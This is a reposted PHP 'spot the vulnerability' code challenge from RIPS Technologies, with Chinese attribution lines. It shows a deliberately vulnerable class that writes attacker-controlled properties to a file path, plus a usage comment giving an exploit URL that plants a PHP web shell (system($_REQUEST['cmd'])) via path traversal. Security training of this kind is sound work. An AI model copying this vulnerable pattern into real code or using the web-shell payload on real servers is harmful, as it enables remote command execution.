转自
Can you spot the vulnerability? #PHP #coding #codechallenge pic.twitter.com/ynKyvIJXvc
— RIPS Technologies (@ripstech) April 5, 2019
<?php
'''
* Usage: http://localhost/?id=../tmp/shell.php&lost=<?php system($_REQUEST["cmd"]);?>
'''
class Carrot {
const EXTERNAL_DIRECTORY = '/tmp/';
private $id;
private $lost = 0;
private $bought = 0;
public function __construct($input) {
$this->id = rand(1, 1000);
foreach ($input as $field => $count) {
$this->$field = $count++;
}
}
public function __destruct() {
file_put_contents(
self::EXTERNAL_DIRECTORY . $this->id,
var_export(get_object_vars($this), true)
);
}
}
$carrot = new Carrot($_GET);
本文作者为lufei,转载请注明。
